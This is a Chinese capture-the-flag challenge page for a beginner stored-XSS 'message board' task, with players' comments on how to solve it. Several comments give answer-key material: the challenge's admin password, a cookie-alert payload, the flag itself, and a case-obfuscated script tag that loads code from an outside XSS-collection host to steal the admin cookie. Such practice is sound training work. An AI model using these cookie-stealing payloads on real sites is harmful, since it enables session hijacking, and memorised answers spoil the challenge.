留言板WEB 未解决

分数: 10 金币: 3
题目作者: harry
一  血: ꧁༺༽༾ཊ彪ཏ༿༼༻꧂
一血奖励: 5金币
解  决: 2298
提  示: 题目无需登录后台!需要xss平台接收flag
描  述:
http协议需要http协议的xss平台
...
登录回复
评论
safeweb20 1年前
举报

这道题通过dirsearch.py 扫描网址找到sql账号数据之后登录admin账户,通过xss注入可以找到flag, 管理员密码是011be4d65feac1a8 账户是admin xss可以使用<script>alert(document.cookie);</script>

回复 1
bigbox1 1年前
举报

这个题有问题,管理员密码是011be4d65feac1a8,作者把那个文件删了应该是,那个登录框不是sql注入

回复 2
sshui 1年前
举报

nmd,改题了也不及时说明。凸(艹皿艹 )

回复 1
admin999 1年前
举报

XSS插进图片了,不过好像收不到flag啊?

回复 0
sshui 1年前
举报

@admin999 找后台

回复 0
admin999 1年前
举报

@sshui 所以这题现在怎么做...

回复 0
sshui 1年前
举报

改题了

回复 0
anguilin 1年前
举报

沙比题

回复 5
Striker123456 1年前
举报

尖括号字体实体,双引号转义,src自动加上http://。这怎么做?

回复 0
b1lld 1年前
举报

我说你们这些网站出题人是在干嘛啊?新手题官方wp写的那么简短,能缩写就整缩写,突出的就是一个边看文章边查才能体现你的深度是吧?一道入门题硬是要查几篇博客一顿查是吧?一道题本来好不容易搜到几篇wp能看的,咔咔一顿操作,做到一半发现原来的做题思路行不通了,哦,看下评论,题目改了。我说你们是在干嘛啊????新手题诶???建这个网站的目的不是让人学习吗??不是为了让人入门吗???不是为了让人按照一个思路去

回复 15
anguilin 1年前
举报

咋做

回复 0
skiller 1年前
举报

db.sql是怎么搜出来的?我用dir没搜出来啊?

回复 9
BugKugirl 1年前
举报

在线XSS平台(https://xss.pt/)生成xss代码(<sCRiPt sRC=//0x.ax/AUBv></sCrIpT>)放到留言板,xss平台直接获得cookie : flag=flag%7Bf7784e4107be555d08be73ac01569c6f%7D,将flag进行url解码(http://www.jsons.cn/urlencode)

回复 0
1317554973 1年前
举报

拿到xss得flag填进去但不对

回复 0

WriteUp

image
丶我亚索贼六

5 金币

立即查看

评分(15)

解题动态

yangcan666 攻破了该题 1小时前
Asamllcoder 攻破了该题 3小时前
huanying1247 攻破了该题 16小时前
2200130448 攻破了该题 1天前
18993762527 攻破了该题 3天前
X9527C 攻破了该题 3天前
lszwmm 攻破了该题 3天前
xiao37 攻破了该题 4天前
JinYeTU 攻破了该题 6天前
guqiyuan 攻破了该题 6天前
yqwapc001 攻破了该题 6天前
Spirita 攻破了该题 7天前
junkbird 攻破了该题 7天前
Vinsonx 攻破了该题 7天前
srsr233 攻破了该题 7天前
ZhouShaoyang 攻破了该题 7天前
Graito 攻破了该题 8天前
18225355670 攻破了该题 8天前
18042157087 攻破了该题 8天前
skyorangezxc 攻破了该题 8天前